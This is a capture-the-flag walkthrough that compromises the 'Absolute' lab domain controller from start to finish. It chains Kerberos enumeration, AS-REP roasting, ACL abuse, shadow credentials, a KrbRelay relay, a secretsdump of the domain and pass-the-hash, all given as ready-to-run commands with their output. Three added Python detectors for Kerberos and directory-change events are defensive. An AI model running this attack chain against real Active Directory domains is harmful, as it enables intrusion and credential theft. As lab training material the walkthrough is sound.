Scanning
> TARGET=10.129.49.253 && nmap -p$(nmap -p- --min-rate=1000 -T4 $TARGET -Pn | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//) -sC -sV -Pn -vvv $TARGET -oN nmap_tcp_all.nmap
PORT STATE SERVICE REASON VERSION
53/tcp open domain syn-ack ttl 127 Simple DNS Plus
80/tcp open http syn-ack ttl 127 Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Absolute
| http-methods:
| Supported Methods: OPTIONS TRACE GET HEAD POST
|_ Potentially risky methods: TRACE
88/tcp open kerberos-sec syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2022-09-26 16:21:27Z)
135/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack ttl 127 Microsoft Windows netbios-ssn
389/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: absolute.htb0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds? syn-ack ttl 127
464/tcp open kpasswd5? syn-ack ttl 127
593/tcp open ncacn_http syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: absolute.htb0., Site: Default-First-Site-Name)
3268/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: absolute.htb0., Site: Default-First-Site-Name)
3269/tcp open ssl/ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: absolute.htb0., Site: Default-First-Site-Name)
5985/tcp open http syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp open mc-nmf syn-ack ttl 127 .NET Message Framing
47001/tcp open http syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49665/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49666/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49667/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49671/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49678/tcp open ncacn_http syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
49679/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49685/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49690/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49700/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49704/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
53183/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
Finding usernames
- Using kerbrute to find usernames
> kerbrute userenum --dc absolute.htb -d absolute.htb /usr/share/wordlists/kerberos_enum_userlists/A-Z.Surnames.txt
2022/09/26 16:19:30 > [+] VALID USERNAME: J.ROBERTS@absolute.htb
2022/09/26 16:19:30 > [+] VALID USERNAME: J.ROBINSON@absolute.htb
2022/09/26 16:20:36 > [+] VALID USERNAME: L.MOORE@absolute.htb
2022/09/26 16:21:38 > [+] VALID USERNAME: N.SMITH@absolute.htb
2022/09/26 16:24:20 > [+] VALID USERNAME: S.JOHNSON@absolute.htb
- Usernames can also be recovered from the metadata of the uploaded pictures
> wget http://absolute.htb/images/hero_1.jpg
> exiftool hero_1.jpg
Author : James Roberts
- Using this method, the following names can be found; we reformat them into the username format found above (first initial, dot, surname):
James Roberts -> J.ROBERTS@absolute.htb
Michael Chaffrey -> M.Chaffrey@absolute.htb
Donald Klay -> D.Klay@absolute.htb
Sarah Osvald -> S.Osvald@absolute.htb
Jeffer Robinson -> J.Robinson@absolute.htb
- Compile the found usernames into a users.txt file
ASREP Roasting
- Perform AS-REP roasting to get ticket hashes; a hash was returned for D.Klay
> impacket-GetNPUsers absolute.htb/ -no-pass -usersfile users.txt
$krb5asrep$23$D.Klay@absolute.htb@ABSOLUTE.HTB:46bea6d8a1effd22bc2c5284d78ba055$954732a125e1d0eac34eb6899bcc92d0af0d9f00f3a79b3166955d5dd4832755edffcb8c50dfda56c9b0fde3862158c6cc3d8abcc979fbd3d04813f0d15bf48bb98e6f0ab365493f8dc57e37ec96fbbd3771c0ecdc9ed11dd95a06b6e0eb1e090219968c55432439e225d8eb4577a3509e1e4fa2234344548095bc7ade600abd8fb639e181cb3359dc753060c22e9d105b3df2e6cff74bfd320b1d5485a55ed6a5c2951962eb0910eaf0c9a10d8d76392006b4e4764d86364a9a64e5534addb464d9d87ed7ea2644d49ead89dfb30eb2a90e6032178646a304b4ea5f2b1e319dba05d8d741dcaa82b792f891
- Crack the hash using hashcat (mode 18200, Kerberos 5 AS-REP etype 23); the recovered password is Darkmoonsky248girl. Quote the hash so the shell does not expand the `$` fields:
> hashcat -m 18200 '$krb5asrep$23$D.Klay@absolute.htb@ABSOLUTE.HTB:<hash>$<hash>' rockyou.txt
- Request a Kerberos TGT for authentication
> ntpdate -s absolute.htb && impacket-getTGT 'absolute.htb/d.klay:Darkmoonsky248girl'
> export KRB5CCNAME=d.klay.ccache
# If you see KRB_AP_ERR_SKEW, your machine's clock is out of sync with the DC's. Disable your machine's automatic time updates and re-sync with the target DC:
> timedatectl set-ntp false
> ntpdate -s absolute.htb
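Both steps above leave a distinctive trace on the domain controller: kerbrute's username enumeration produces a burst of 4768 (TGT requested) events with result code 0x6 (KDC_ERR_C_PRINCIPAL_UNKNOWN) from one source address, and AS-REP roasting produces a successful 4768 with Pre-Authentication Type 0 (no pre-auth) and, typically, RC4 (0x17) as the ticket encryption type. The following detector is an added example, not part of the original write-up; the event records are constructed samples shaped after the Event 4768 fields (TargetUserName, IpAddress, Status, PreAuthType, TicketEncryptionType) and the source IPs and most usernames are invented. It assumes "Audit Kerberos Authentication Service" is enabled on the DCs, otherwise 4768 is never written.

```python
"""Detect Kerberos username enumeration and AS-REP roasting from 4768 events.

Added educational example. SAMPLE_EVENTS are constructed, not real log data;
the dict keys mirror the Event 4768 fields named in the lead-in.
"""
from collections import defaultdict
from datetime import datetime, timedelta

KDC_ERR_C_PRINCIPAL_UNKNOWN = "0x6"   # requested account does not exist
RC4_HMAC = "0x17"                     # legacy etype roasting tools ask for

SAMPLE_EVENTS = [
    # Burst of unknown-principal failures from one host: username enumeration
    {"time": "2022-09-26T16:19:30", "user": "a.adams",   "ip": "10.10.14.5", "status": "0x6", "preauth": "-", "etype": "0xffffffff"},
    {"time": "2022-09-26T16:19:30", "user": "b.baker",   "ip": "10.10.14.5", "status": "0x6", "preauth": "-", "etype": "0xffffffff"},
    {"time": "2022-09-26T16:19:31", "user": "c.carter",  "ip": "10.10.14.5", "status": "0x6", "preauth": "-", "etype": "0xffffffff"},
    {"time": "2022-09-26T16:19:31", "user": "d.davis",   "ip": "10.10.14.5", "status": "0x6", "preauth": "-", "etype": "0xffffffff"},
    {"time": "2022-09-26T16:19:32", "user": "e.evans",   "ip": "10.10.14.5", "status": "0x6", "preauth": "-", "etype": "0xffffffff"},
    # A single typo from a workstation: benign noise
    {"time": "2022-09-26T16:30:00", "user": "j.robertz", "ip": "10.10.20.7", "status": "0x6", "preauth": "-", "etype": "0xffffffff"},
    # Normal logon: pre-auth type 2 (encrypted timestamp), AES256 ticket
    {"time": "2022-09-26T16:31:00", "user": "j.roberts", "ip": "10.10.20.7", "status": "0x0", "preauth": "2", "etype": "0x12"},
    # TGT issued with no pre-authentication and RC4: roastable account harvested
    {"time": "2022-09-26T16:35:10", "user": "d.klay",    "ip": "10.10.14.5", "status": "0x0", "preauth": "0", "etype": "0x17"},
]


def _parse_time(text):
    return datetime.fromisoformat(text)


def detect_enumeration(events, threshold=5, window=timedelta(seconds=60)):
    """Return {ip: peak_failures} for sources whose unknown-principal failures
    reach `threshold` inside any sliding `window`."""
    failures = defaultdict(list)
    for ev in events:
        if ev["status"].lower() == KDC_ERR_C_PRINCIPAL_UNKNOWN:
            failures[ev["ip"]].append(_parse_time(ev["time"]))
    flagged = {}
    for ip, times in failures.items():
        times.sort()
        start, peak = 0, 0
        for end in range(len(times)):
            while times[end] - times[start] > window:   # slide window forward
                start += 1
            peak = max(peak, end - start + 1)
        if peak >= threshold:
            flagged[ip] = peak
    return flagged


def detect_asrep_roasting(events):
    """Return successful TGT requests made without pre-authentication.
    PreAuthType 0 means the account has 'Do not require Kerberos
    preauthentication' set; with RC4 it is the classic roasting signature."""
    hits = []
    for ev in events:
        if ev["status"].lower() == "0x0" and ev["preauth"] == "0":
            hits.append({"user": ev["user"], "ip": ev["ip"],
                         "rc4": ev["etype"].lower() == RC4_HMAC})
    return hits


if __name__ == "__main__":
    print("enumeration sources:", detect_enumeration(SAMPLE_EVENTS))
    print("roastable TGTs:", detect_asrep_roasting(SAMPLE_EVENTS))
```

The roasting rule fires on Pre-Authentication Type 0 regardless of etype, because the real fix is removing the "Do not require Kerberos preauthentication" flag from the account; the RC4 flag is carried along only to prioritise accounts whose hashes crack fastest.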
Getting the SMB service account and password
> ~/tools/cme/cme ldap -u d.klay -d absolute.htb -k --kdcHost dc.absolute.htb --users 10.129.49.253
SMB 10.129.49.253 445 DC [*] Windows 10.0 Build 17763 x64 (name:DC) (domain:absolute.htb) (signing:True) (SMBv1:False)
LDAP 10.129.49.253 389 DC [+] absolute.htb\
LDAP 10.129.49.253 389 DC [*] Total of records returned 20
LDAP 10.129.49.253 389 DC Administrator Built-in account for administering the computer/domain
LDAP 10.129.49.253 389 DC Guest Built-in account for guest access to the computer/domain
LDAP 10.129.49.253 389 DC krbtgt Key Distribution Center Service Account
LDAP 10.129.49.253 389 DC J.Roberts
LDAP 10.129.49.253 389 DC M.Chaffrey
LDAP 10.129.49.253 389 DC D.Klay
LDAP 10.129.49.253 389 DC s.osvald
LDAP 10.129.49.253 389 DC j.robinson
LDAP 10.129.49.253 389 DC n.smith
LDAP 10.129.49.253 389 DC m.lovegod
LDAP 10.129.49.253 389 DC l.moore
LDAP 10.129.49.253 389 DC c.colt
LDAP 10.129.49.253 389 DC s.johnson
LDAP 10.129.49.253 389 DC d.lemm
LDAP 10.129.49.253 389 DC svc_smb AbsoluteSMBService123!
LDAP 10.129.49.253 389 DC svc_audit
LDAP 10.129.49.253 389 DC winrm_user Used to perform simple network tasks
- Now we have a service account, svc_smb:AbsoluteSMBService123! (the password sits in the account's description column above). Log in via SMB and get the shared files:
> impacket-getTGT 'absolute.htb/svc_smb:AbsoluteSMBService123!'
> export KRB5CCNAME=svc_smb.ccache
> impacket-smbclient svc_smb@dc.absolute.htb -k -no-pass
# use shared
# ls
drw-rw-rw- 0 Thu Sep 1 13:02:23 2022 .
drw-rw-rw- 0 Thu Sep 1 13:02:23 2022 ..
-rw-rw-rw- 72 Thu Sep 1 13:02:23 2022 compiler.sh
-rw-rw-rw- 67584 Thu Sep 1 13:02:23 2022 test.exe
# get compiler.sh
# get test.exe
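The svc_smb password above was readable by any domain user because it was stored in the account's `description` attribute. The following audit is an added example, not part of the original write-up, and the records in it are constructed (svc_backup, svc_scan and their descriptions are invented); it shows the two checks a defender would run over an export of sAMAccountName/description pairs: a credential keyword followed by a value, and a stand-alone token that passes a password-complexity test.

```python
"""Audit AD user descriptions for plaintext credentials.

Added educational example; SAMPLE_RECORDS are constructed, not data from a
real directory. Feed it the (sAMAccountName, description) pairs from an LDAP
export to find accounts whose password is exposed to every domain user.
"""
import re

SAMPLE_RECORDS = [
    {"sam": "Administrator", "description": "Built-in account for administering the computer/domain"},
    {"sam": "krbtgt",        "description": "Key Distribution Center Service Account"},
    {"sam": "svc_backup",    "description": "Backup service - pwd: Winter2022!Backup"},   # constructed
    {"sam": "svc_scan",      "description": "Sc4nner#Service2022"},                       # constructed
    {"sam": "winrm_user",    "description": "Used to perform simple network tasks"},
    {"sam": "svc_sql",       "description": ""},
]

# A credential keyword followed by a separator and a value, e.g. "pwd: Abc123!"
KEYWORD_RE = re.compile(
    r"\b(pass(?:word|wd)?|pwd|secret|cred(?:ential)?s?)\b[\s:=]+\S+", re.I)


def looks_like_password(token):
    """Complexity heuristic: >= 8 chars, contains a digit, and at least three
    of the four character classes. Requiring a digit keeps hyphenated words
    such as 'Built-in' (upper, lower, symbol) from being flagged."""
    has_lower = re.search(r"[a-z]", token) is not None
    has_upper = re.search(r"[A-Z]", token) is not None
    has_digit = re.search(r"\d", token) is not None
    has_symbol = re.search(r"[^A-Za-z0-9]", token) is not None
    classes = sum([has_lower, has_upper, has_digit, has_symbol])
    return len(token) >= 8 and has_digit and classes >= 3


def audit_descriptions(records):
    """Return [{'sam': ..., 'reasons': [...]}] for every suspicious record."""
    findings = []
    for rec in records:
        desc = rec.get("description") or ""
        reasons = []
        if KEYWORD_RE.search(desc):
            reasons.append("credential keyword followed by value")
        if any(looks_like_password(tok) for tok in desc.split()):
            reasons.append("high-complexity token")
        if reasons:
            findings.append({"sam": rec["sam"], "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in audit_descriptions(SAMPLE_RECORDS):
        print(f"{f['sam']}: {', '.join(f['reasons'])}")
```

Remediation is a password rotation plus clearing the attribute, since the description is readable by Authenticated Users by default and cannot be protected by rotating alone.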
Getting credential from test.exe
- Get the test.exe file and run it on a Windows machine with the VPN connected, while capturing its traffic with Wireshark. The captured LDAP bind below carries a new credential:
absolute.htb\m.lovegod:AbsoluteLDAP2022!
0....6...`....-.....absolute.htb\mlovegod..AbsoluteLDAP2022!0....h...a...._
.1...X80090308: LdapErr: DSID-0C090439, comment: AcceptSecurityContext error, data 52e, v4563.0........B.
- Request a Kerberos TGT for authentication
> ntpdate -s absolute.htb && impacket-getTGT absolute.htb/m.lovegod:AbsoluteLDAP2022!
> export KRB5CCNAME=m.lovegod.ccache
- From LDAP enumeration using Python, only the following auth types are supported: GSSAPI, GSS-SPNEGO, EXTERNAL, DIGEST-MD5. However, the official bloodhound-python does not support Kerberos yet, so this fork was used instead: https://github.com/jazzpizazz/BloodHound.py-Kerberos
> python3 ~/tools/BloodHound.py-Kerberos/bloodhound.py -u m.lovegod -k -d absolute.htb -dc dc.absolute.htb -ns 10.129.49.253 --dns-tcp --zip -no-pass -c All
- From the collected info we learn that m.lovegod owns the group "Network Audit", and that group has GenericWrite over winrm_user
User: winrm_user
- Set up a Windows Server; I used 2019
- Install the ActiveDirectory module
- Add a hosts file entry for absolute.htb; DO NOT add dc.absolute.htb, let it resolve itself
- Change the internet time server to absolute.htb
- Change the network adapter's DNS server to the target DC IP
- Then run the following. Be quick: the DC resets the AD values very regularly, so prepare everything in a copy-and-paste-ready form
- On the Windows Server, run the PowerShell below to add the user m.lovegod to the "Network Audit" group; the last three commands (getTGT, KRB5CCNAME, pywhisker) run back on the attacking machine
$dc_domain="ABSOLUTE.HTB"
$SecPassword = ConvertTo-SecureString "AbsoluteLDAP2022!" -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('ABSOLUTE.HTB\m.lovegod', $SecPassword)
Add-DomainObjectAcl -Credential $Cred -TargetIdentity "Network Audit" -Rights all -DomainController DC.ABSOLUTE.HTB -principalidentity "m.lovegod"
Add-ADPrincipalGroupMembership -Identity m.lovegod -MemberOf 'Network Audit' -Credential $Cred -Server DC.ABSOLUTE.HTB
Get-DomainGroupMember -Identity 'network audit' -Domain $dc_domain -DomainController DC.ABSOLUTE.HTB -Credential $cred
ntpdate -s absolute.htb && impacket-getTGT absolute.htb/m.lovegod:AbsoluteLDAP2022!
export KRB5CCNAME=m.lovegod.ccache
python3 ~/tools/pywhisker/pywhisker.py -d absolute.htb -u "m.lovegod" -k --no-pass -t "winrm_user" --action "add"
- The pywhisker command above generates a PFX file and a password. Use PKINITtools to get a ticket with that PFX:
python3 ~/tools/PKINITtools/gettgtpkinit.py absolute.htb/winrm_user -cert-pfx <pfx> -pfx-pass <password> winrm_user_ccache
- Note that a ccache is generated for winrm_user. Then edit /etc/krb5.conf and make sure the realm names are in CAPS:
# Ensure the realms in /etc/krb5.conf are in UPPERCASE
[libdefaults]
default_realm = ABSOLUTE.HTB
[realms]
ABSOLUTE.HTB = {
kdc = DC.ABSOLUTE.HTB
admin_server = ABSOLUTE.HTB
}
- Use evil-winrm with the ccache file to get a shell
> export KRB5CCNAME=winrm_user_ccache
> ntpdate -s absolute.htb && evil-winrm -i DC.ABSOLUTE.HTB -r ABSOLUTE.HTB
Privilege escalation
# Download and compile the three tools, then upload them to the target
# https://github.com/cube0x0/KrbRelay
# https://github.com/antonioCoco/RunasCs
# https://github.com/GhostPack/Rubeus/
> wget http://<ip>/KrbRelay.exe -O .\KrbRelay.exe
> wget http://<ip>/RunasCs_net4.exe -O .\RunasCs_net4.exe
> wget http://<ip>/Rubeus.exe -O .\Rubeus.exe
- Use the uploaded tools to force SYSTEM (DC$) authentication through the COM server and relay it to LDAP
> C:\Users\winrm_user\Documents\RunasCs_net4.exe m.lovegod 'AbsoluteLDAP2022!' -d absolute.htb -l 9 "C:\Users\winrm_user\Documents\KrbRelay.exe -spn ldap/dc.absolute.htb -clsid {752073A1-23F2-4396-85F0-8FDB879ED0ED} -shadowcred"
[*] Relaying context: absolute.htb\DC$
[*] Rewriting function table
[*] Rewriting PEB
[*] GetModuleFileName: System
[*] Init com server
[*] GetModuleFileName: C:\Users\winrm_user\Documents\KrbRelay.exe
[*] Register com server
objref:TUVPVwEAAAAAAAAAAAAAAMAAAAAAAABGgQIAAAAAAAAY0+0+5iDfgbHK2kd8FI2iApgAAJwW//+08pB7XXrT8SIADAAHADEAMgA3AC4AMAAuADAALgAxAAAAAAAJAP//AAAeAP//AAAQAP//AAAKAP//AAAWAP//AAAfAP//AAAOAP//AAAAAA==:
[*] Forcing SYSTEM authentication
[*] Using CLSID: 752073a1-23f2-4396-85f0-8fdb879ed0ed
[*] apReq: <apReq>
[*] bind: 0
[*] ldap_get_option: LDAP_SASL_BIND_IN_PROGRESS
[*] apRep1: <apRep1>
[*] AcceptSecurityContext: SEC_I_CONTINUE_NEEDED
[*] fContextReq: Delegate, MutualAuth, UseDceStyle, Connection
[*] apRep2: <apRep2>
[*] bind: 0
[*] ldap_get_option: LDAP_SUCCESS
[+] LDAP session established
[*] ldap_modify: LDAP_SUCCESS
Rubeus.exe asktgt /user:DC$ /certificate:<cert> /password:"<pass>" /getcredentials /show
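Every write in this chain (the ACL rewrite on "Network Audit", the group membership change, pywhisker's key credential on winrm_user, and KrbRelay's `-shadowcred` write on DC$) is an LDAP modification that a domain controller records as Event 5136 (A directory service object was modified) when "Audit Directory Service Changes" is enabled and the objects carry a SACL. The triage below is an added example, not part of the original write-up; its events are constructed samples following the 5136 fields (SubjectUserName, ObjectDN, ObjectClass, AttributeLDAPDisplayName, OperationType), reusing the page's account and group names. It flags msDS-KeyCredentialLink writes on computer objects or on another principal's object, nTSecurityDescriptor writes by non-administrative subjects, and member additions to a watched group.

```python
"""Triage Event 5136 records for shadow-credential and ACL-abuse patterns.

Added educational example; SAMPLE_EVENTS are constructed, not real log data.
OperationType %%14674 is 'Value Added', %%14675 is 'Value Deleted'.
"""
import re

VALUE_ADDED = "%%14674"

SAMPLE_EVENTS = [
    # Benign: a user enrols its own key (e.g. Windows Hello for Business)
    {"subject": "ABSOLUTE\\j.roberts", "object_dn": "CN=j.roberts,CN=Users,DC=absolute,DC=htb",
     "object_class": "user", "attribute": "msDS-KeyCredentialLink", "op": VALUE_ADDED},
    # Suspicious: one user writes a key credential onto a different user object
    {"subject": "ABSOLUTE\\m.lovegod", "object_dn": "CN=winrm_user,CN=Users,DC=absolute,DC=htb",
     "object_class": "user", "attribute": "msDS-KeyCredentialLink", "op": VALUE_ADDED},
    # Suspicious: a key credential appears on the domain controller's computer object
    {"subject": "ABSOLUTE\\DC$", "object_dn": "CN=DC,OU=Domain Controllers,DC=absolute,DC=htb",
     "object_class": "computer", "attribute": "msDS-KeyCredentialLink", "op": VALUE_ADDED},
    # Suspicious: a regular user rewrites a group's security descriptor
    {"subject": "ABSOLUTE\\m.lovegod", "object_dn": "CN=Network Audit,CN=Users,DC=absolute,DC=htb",
     "object_class": "group", "attribute": "nTSecurityDescriptor", "op": "%%14675"},
    # Benign: an administrator delegates rights on an OU (constructed OU name)
    {"subject": "ABSOLUTE\\Administrator", "object_dn": "OU=Servers,DC=absolute,DC=htb",
     "object_class": "organizationalUnit", "attribute": "nTSecurityDescriptor", "op": "%%14675"},
    # Suspicious: membership added to a watched group
    {"subject": "ABSOLUTE\\m.lovegod", "object_dn": "CN=Network Audit,CN=Users,DC=absolute,DC=htb",
     "object_class": "group", "attribute": "member", "op": VALUE_ADDED},
    # Benign: a key credential removed (cleanup), not flagged by these rules
    {"subject": "ABSOLUTE\\j.roberts", "object_dn": "CN=j.roberts,CN=Users,DC=absolute,DC=htb",
     "object_class": "user", "attribute": "msDS-KeyCredentialLink", "op": "%%14675"},
]


def _account_from_subject(subject):
    """'ABSOLUTE\\\\m.lovegod' -> 'm.lovegod'; machine accounts drop the '$'."""
    return subject.split("\\")[-1].rstrip("$").lower()


def _first_rdn(dn):
    """'CN=winrm_user,CN=Users,...' -> 'winrm_user' (non-CN DNs returned whole)."""
    m = re.match(r"\s*CN=([^,]+)", dn, re.I)
    return m.group(1).strip().lower() if m else dn.lower()


def triage_5136(events, admin_accounts=frozenset(), watched_groups=frozenset()):
    """Return one finding per event that matches a rule, in input order."""
    admins = {a.lower() for a in admin_accounts}
    watched = {g.lower() for g in watched_groups}
    findings = []
    for ev in events:
        attr = ev["attribute"].lower()
        subj = _account_from_subject(ev["subject"])
        target = _first_rdn(ev["object_dn"])
        reason = None
        if attr == "msds-keycredentiallink" and ev["op"] == VALUE_ADDED:
            if ev["object_class"].lower() == "computer":
                reason = "key credential added to a computer object"
            elif subj != target:
                reason = "key credential added to another principal's object"
        elif attr == "ntsecuritydescriptor" and subj not in admins:
            reason = "object ACL rewritten by a non-administrative subject"
        elif attr == "member" and ev["op"] == VALUE_ADDED and target in watched:
            reason = "member added to a watched group"
        if reason:
            findings.append({"subject": ev["subject"], "object_dn": ev["object_dn"],
                             "attribute": ev["attribute"], "reason": reason})
    return findings


if __name__ == "__main__":
    for f in triage_5136(SAMPLE_EVENTS, {"Administrator"}, {"Network Audit"}):
        print(f"{f['reason']}: {f['subject']} -> {f['object_dn']}")
```

The computer-object rule is deliberately unconditional: the relayed write in the KrbRelay step is performed as DC$ on its own object, so a subject-versus-target comparison alone would miss it, and machine accounts enrolling key credentials is rare enough in most environments to review every occurrence.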
- This prints a Rubeus.exe command; execute it to get the NTLM hash of DC$
> .\Rubeus.exe asktgt /user:DC$ /certificate:<cert> /password:"<pass>" /getcredentials /show
[*] Action: Ask TGT
[*] Using PKINIT with etype rc4_hmac and subject: CN=DC$
[*] Building AS-REQ (w/ PKINIT preauth) for: 'absolute.htb\DC$'
[+] TGT request successful!
[*] base64(ticket.kirbi):
<base64-ticket>
ServiceName : krbtgt/absolute.htb
ServiceRealm : ABSOLUTE.HTB
UserName : DC$
UserRealm : ABSOLUTE.HTB
StartTime : 9/30/2022 7:46:17 AM
EndTime : 9/30/2022 5:46:17 PM
RenewTill : 10/7/2022 7:46:17 AM
Flags : name_canonicalize, pre_authent, initial, renewable, forwardable
KeyType : rc4_hmac
Base64(key) : yHrqDFTj1Zwc3W8/QBNKDg==
ASREP (key) : F99EF936A3999F80D62AC070288A3D00
[*] Getting credentials using U2U
CredentialInfo :
Version : 0
EncryptionType : rc4_hmac
CredentialData :
CredentialCount : 1
NTLM : A7864AB463177ACB9AEC553F18F42577
- Keep a note of the NTLM hash and use secretsdump as DC$ to dump all hashes from the DC
> python3 ~/tools/impacket-dacledit/examples/secretsdump.py -hashes :<ntlm> 'DC$@ABSOLUTE.HTB'
Impacket v0.9.25.dev1 - Copyright 2021 SecureAuth Corporation
[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator\Administrator:500:aad3b435b51404eeaad3b435b51404ee:<ntlm>:::
...
[*] Cleaning up...
- Login via evil-winrm using the admin hash to fetch the root flag
> evil-winrm -i DC.ABSOLUTE.HTB -u Administrator -H <ntlm>